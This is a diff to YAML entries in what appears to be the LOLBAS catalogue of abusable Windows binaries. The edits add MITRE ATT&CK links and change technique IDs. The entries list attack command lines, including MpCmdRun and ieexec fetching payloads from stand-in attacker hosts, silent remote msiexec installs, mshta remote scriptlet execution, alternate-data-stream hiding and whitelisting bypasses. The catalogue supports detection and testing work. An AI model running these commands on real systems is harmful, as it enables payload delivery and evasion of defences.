@@ -17,6 +18,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\ftp.exe

yml/OSBinaries/GfxDownloadWrapper.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/techniques/T1105/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: c:\windows\system32\driverstore\filerepository\64kb6472.inf_amd64_3daef03bbe98572b\

yml/OSBinaries/Gpscript.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
     Category: Execute
     Privileges: Administrator
-    MitreID: T1218
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: Gpscript /startup
     Description: Executes startup scripts configured in Group Policy
     Usecase: Add local group policy logon script to execute file and hide from defensive counter measures
     Category: Execute
     Privileges: Administrator
-    MitreID: T1218
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\gpscript.exe

yml/OSBinaries/Hh.yml

@@ -10,13 +10,15 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: HH.exe c:\windows\system32\calc.exe
     Description: Executes calc.exe with HTML Help.
     Usecase: Execute process with HH.exe
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1216
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1216
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\hh.exe

yml/OSBinaries/IMEWDBLD.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe

yml/OSBinaries/Ie4uinit.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: c:\windows\system32\ie4uinit.exe

yml/OSBinaries/Ieexec.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
     Description: Downloads and executes bypass.exe from the remote server.
@@ -17,6 +18,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe

yml/OSBinaries/Ilasm.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
+    MitreLink: https://attack.mitre.org/techniques/T1127/
     OperatingSystem: Windows 10,7
   - Command: ilasm.exe C:\public\test.txt /dll
     Description: Binary file used by .NET to compile c# code to dll
@@ -17,6 +18,7 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
+    MitreLink: https://attack.mitre.org/techniques/T1127/
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe

yml/OSBinaries/Infdefaultinstall.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Infdefaultinstall.exe

yml/OSBinaries/Installutil.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Use to execute code and bypass application whitelisting
     Category: AWL bypass
     Privileges: User
-    MitreID: T1218.004
+    MitreID: T1118
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1118
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
     Description: Execute the target .NET DLL or EXE.
     Usecase: Use to execute code and bypass application whitelisting
     Category: Execute
     Privileges: User
-    MitreID: T1218.004
+    MitreID: T1118
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1118
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
@@ -30,7 +32,7 @@ Detection:
 Resources:
   - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
-  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md
+  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1118/T1118.md
   - Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
   - Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool

yml/OSBinaries/Jsc.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: jsc.exe /t:library Library.js
     Description: Use jsc.exe to compile javascript code stored in Library.js and output Library.dll.
@@ -17,6 +18,7 @@ Commands:
     Category: Compile
     Privileges: User
     MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe

yml/OSBinaries/Makecab.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Hide data compressed into an alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
     Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
     Usecase: Hide data compressed into an alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
     Description: Download and compresses the target file and stores it in the target file.
@@ -24,6 +26,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\makecab.exe

yml/OSBinaries/Mavinject.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Inject dll file into running process
     Category: Execute
     Privileges: User
-    MitreID: T1218.013
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
     Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
     Usecase: Inject dll file into running process
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\mavinject.exe

yml/OSBinaries/Microsoft.Workflow.Compiler.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows 10S
   - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
     Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
@@ -17,6 +18,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows 10S
   - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
     Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
@@ -24,6 +26,7 @@ Commands:
     Category: AWL Bypass
     Privileges: User
     MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows 10S
 Full_Path:
   - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe

yml/OSBinaries/Mmc.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Configure a snap-in to load a COM custom class (CLSID) that has been added to the registry
     Category: Execute
     Privileges: User
-    MitreID: T1218.014
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows 10 (and possibly earlier versions)
 Full_Path:
   - Path: C:\Windows\System32\mmc.exe

yml/OSBinaries/MpCmdRun.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows 10
   - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url https://attacker.server/beacon.exe -path C:\Users\Public\Downloads\evil.exe
     Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation]
@@ -17,13 +18,15 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows 10
   - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\nicefile.txt:evil.exe
     Description: Download file to machine and store it in Alternate Data Stream
     Usecase: Hide downloaded data inton an Alternate Data Stream
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe

yml/OSBinaries/Msbuild.yml

@@ -9,35 +9,40 @@ Commands:
     Usecase: Compile and run code
     Category: AWL bypass
     Privileges: User
-    MitreID: T1127.001
+    MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msbuild.exe project.csproj
     Description: Build and execute a C# project stored in the target csproj file.
     Usecase: Compile and run code
     Category: Execute
     Privileges: User
-    MitreID: T1127.001
+    MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msbuild.exe @sample.rsp
     Description: Executes Logger statements from rsp file 
     Usecase: Execute DLL
     Category: Execute
     Privileges: User
-    MitreID: T1127.001
+    MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msbuild.exe /logger:TargetLogger,C:\Loggers\TargetLogger.dll;MyParameters,Foo
     Description: Executes generated Logger dll file with TargetLogger export
     Usecase: Execute DLL
     Category: Execute
     Privileges: User
-    MitreID: T1127.001
+    MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msbuild.exe project.proj
     Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
     Usecase: Execute project file that contains XslTransformation tag parameters
     Category: Execute
     Privileges: User
-    MitreID: T1127.001
+    MitreID: T1127
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1127
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10    
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe

yml/OSBinaries/Msconfig.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\msconfig.exe

yml/OSBinaries/Msdt.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
     Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
@@ -17,6 +18,7 @@ Commands:
     Category: AWL bypass
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Msdt.exe

yml/OSBinaries/Mshta.yml

@@ -9,28 +9,32 @@ Commands:
     Usecase: Execute code
     Category: Execute
     Privileges: User
-    MitreID: T1218.005
+    MitreID: T1170
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
     Description: Executes VBScript supplied as a command line argument.
     Usecase: Execute code
     Category: Execute
     Privileges: User
-    MitreID: T1218.005
+    MitreID: T1170
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
     Description: Executes JavaScript supplied as a command line argument.
     Usecase: Execute code
     Category: Execute
     Privileges: User
-    MitreID: T1218.005
+    MitreID: T1170
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: mshta.exe "C:\ads\file.txt:file.hta"
     Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
     Usecase: Execute code hidden in alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1218.005
+    MitreID: T1170
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1170
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
 Full_Path:
   - Path: C:\Windows\System32\mshta.exe

yml/OSBinaries/Msiexec.yml

@@ -9,28 +9,32 @@ Commands:
     Usecase: Execute custom made msi file with attack code
     Category: Execute
     Privileges: User
-    MitreID: T1218.007
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
     Description: Installs the target remote & renamed .MSI file silently.
     Usecase: Execute custom made msi file with attack code from remote server
     Category: Execute
     Privileges: User
-    MitreID: T1218.007
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msiexec /y "C:\folder\evil.dll"
     Description: Calls DLLRegisterServer to register the target DLL.
     Usecase: Execute dll files
     Category: Execute
     Privileges: User
-    MitreID: T1218.007
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: msiexec /z "C:\folder\evil.dll"
     Description: Calls DLLRegisterServer to un-register the target DLL.
     Usecase: Execute dll files
     Category: Execute
     Privileges: User
-    MitreID: T1218.007
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\msiexec.exe

yml/OSBinaries/Netsh.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Proxy execution of .dll
     Category: Execute
     Privileges: User
-    MitreID: T1546.007
+    MitreID: T1128
+    MitreLink: https://attack.mitre.org/techniques/T1128/
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\WINDOWS\System32\Netsh.exe

yml/OSBinaries/Odbcconf.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: odbcconf /a {REGSVR c:\test\test.dll}
     Description: Execute DllREgisterServer from DLL specified.
@@ -17,6 +18,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\odbcconf.exe

yml/OSBinaries/OfflineScannerShell.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: Administrator
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe

yml/OSBinaries/OneDriveStandaloneUpdater.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/techniques/T1105/
     OperatingSystem: Windows 10
 Full_Path:
   - Path: '%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'

yml/OSBinaries/Pcalua.yml

@@ -9,21 +9,24 @@ Commands:
     Usecase: Proxy execution of binary
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: pcalua.exe -a \\server\payload.dll
     Description: Open the target .DLL file with the Program Compatibilty Assistant.
     Usecase: Proxy execution of remote dll file
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
     Description: Open the target .CPL file with the Program Compatibility Assistant.
     Usecase: Execution of CPL files
     Category: Execute
     Privileges: User
-    MitreID: T1202
+    MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\pcalua.exe

yml/OSBinaries/Pcwrun.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\pcwrun.exe

yml/OSBinaries/Pktmon.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Reconnaissance
     Privileges: Administrator
     MitreID: T1040
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1040
     OperatingSystem: Windows 10 1809 and later
   - Command: pktmon.exe filter add -p 445
     Description: Select Desired ports for packet capture
@@ -17,6 +18,7 @@ Commands:
     Category: Reconnaissance
     Privileges: Administrator
     MitreID: T1040
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1040
     OperatingSystem: Windows 10 1809 and later
 Full_Path:
   - Path: c:\windows\system32\pktmon.exe

yml/OSBinaries/Pnputil.yml

@@ -1,22 +1,23 @@
 ---
 Name: Pnputil.exe
-Description: Used for installing drivers
+Description: used for Install drivers.
 Author: Hai vaknin (lux)
-Created: 2020-12-25
+Created: 25/12/2020
 Commands:
   - Command: pnputil.exe -i -a C:\Users\hai\Desktop\mo.inf
-    Description: Used for installing drivers
+    Description: used for Install drivers
-    Usecase: Aadd malicious driver
+    Usecase: add malicious driver.
     Category: Execute
     Privileges: Administrator
-    MitreID: T1547.006
+    MitreID: T1215
+    MitreLink: https://attack.mitre.org/techniques/T1215
     OperatingSystem: Windows 10,7 
 Full_Path:
   - Path: C:\Windows\system32\pnputil.exe
 Code_Sample: https://github.com/LuxNoBulIshit/test.inf/blob/main/inf
 Acknowledgement:
   - Person: Hai Vaknin(Lux) 
-    Handle: '@LuxNoBulIshit'
+    Handle: 'LuxNoBulIshit'
   - Person: Avihay eldad
-    Handle: '@aloneliassaf'
+    Handle: 'aloneliassaf'
 ---

yml/OSBinaries/Presentationhost.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Presentationhost.exe

yml/OSBinaries/Print.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Hide binary file in alternate data stream to potentially bypass defensive counter measures
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: print /D:C:\ADS\CopyOfFile.exe C:\ADS\FileToCopy.exe
     Description: Copy FileToCopy.exe to the target C:\ADS\CopyOfFile.exe
@@ -17,6 +18,7 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe
     Description: Copy File.exe from a network share to the target c:\OutFolder\outfile.exe.
@@ -24,6 +26,7 @@ Commands:
     Category: Copy
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\print.exe

yml/OSBinaries/PrintBrm.yml

@@ -10,13 +10,15 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
+    MitreLink: https://attack.mitre.org/techniques/T1105/
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
     Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
     Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/techniques/T1096/
     OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\spool\tools\PrintBrm.exe

yml/OSBinaries/Psr.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Reconnaissance
     Privileges: User
     MitreID: T1113
+    MitreLink: https://attack.mitre.org/techniques/T1113/
     OperatingSystem: since Windows 7 (client) / Windows 2008 R2
 Full_Path:
   - Path: c:\windows\system32\psr.exe

yml/OSBinaries/Rasautou.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User, Administrator in Windows 8
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
 Full_Path:
   - Path: C:\Windows\System32\rasautou.exe

yml/OSBinaries/Reg.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Hide/plant registry information in Alternate data stream for later use
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\reg.exe

yml/OSBinaries/Regasm.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Execute code and bypass Application whitelisting
     Category: AWL bypass
     Privileges: Local Admin
-    MitreID: T1218.009
+    MitreID: T1121
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: regasm.exe /U AllTheThingsx64.dll
     Description: Loads the target .DLL file and executes the UnRegisterClass function.
     Usecase: Execute code and bypass Application whitelisting
     Category: Execute
     Privileges: User
-    MitreID: T1218.009
+    MitreID: T1121
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
@@ -30,7 +32,7 @@ Detection:
 Resources:
   - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
-  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md
+  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1121/T1121.md
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'

yml/OSBinaries/Regedit.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Hide registry data in alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: regedit C:\ads\file.txt:regfile.reg
     Description: Import the target .REG file into the Registry.
     Usecase: Import hidden registry data from alternate data stream
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\regedit.exe

yml/OSBinaries/Regini.yml

@@ -9,7 +9,8 @@ Commands:
     Usecase: Write to registry
     Category: ADS
     Privileges: User
-    MitreID: T1564.004
+    MitreID: T1096
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\regini.exe

yml/OSBinaries/Register-cimprovider.yml

@@ -10,6 +10,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1218
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1218
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\Register-cimprovider.exe

yml/OSBinaries/Regsvcs.yml

@@ -9,14 +9,16 @@ Commands:
     Usecase: Execute dll file and bypass Application whitelisting
     Category: Execute
     Privileges: Local Admin
-    MitreID: T1218.009
+    MitreID: T1121
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: regsvcs.exe AllTheThingsx64.dll
     Description: Loads the target .DLL file and executes the RegisterClass function.
     Usecase: Execute dll file and bypass Application whitelisting
     Category: AWL bypass
     Privileges: Local Admin
-    MitreID: T1218.009
+    MitreID: T1121
+    MitreLink: https://attack.mitre.org/wiki/Technique/T1121
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\regsvcs.exe
@@ -28,7 +30,7 @@ Detection:
 Resources:
   - Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
